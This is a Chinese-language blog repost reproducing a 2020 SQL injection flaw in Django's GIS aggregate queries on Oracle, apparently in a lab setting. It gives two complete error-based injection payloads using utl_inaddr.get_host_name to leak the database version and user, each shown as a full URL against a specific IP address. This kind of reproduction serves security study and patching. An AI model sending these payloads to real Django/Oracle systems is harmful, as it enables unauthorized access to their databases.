Django GIS SQL注入漏洞

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Django GIS SQL注入漏洞相关的知识,希望对你有一定的参考价值。

Django GIS SQL注入漏洞

Django在2020年3月4日发布了一个安全更新,修复了在GIS 查询功能中存在的SQL注入漏洞。


该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。


1.

首先访问http://your-ip:8000/vuln/。


在该网页中使用get方法构造q的参数,构造SQL注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1 1


http://113.10.152.216:8000/vuln/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1


Django GIS SQL注入漏洞


访问http://your-ip:8000/vuln2/。 


在该网页中使用get方法构造q的参数,构造出SQL注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --


http://113.10.152.216:8000/vuln2/?q=0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --


Django GIS SQL注入漏洞

Django GIS SQL注入漏洞


推荐文章++++

Django GIS SQL注入漏洞

*

*

*


以上是关于Django GIS SQL注入漏洞的主要内容,如果未能解决你的问题,请参考以下文章

[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042

CVE-2020-7471-Django SQL注入漏洞复现

Django SQL注入漏洞复现 (CVE-2022-28347)

CVE-2019-14234 Django JSONField SQL注入漏洞复现

sql注入漏洞都有哪些

如何防范SQL注入漏洞及检测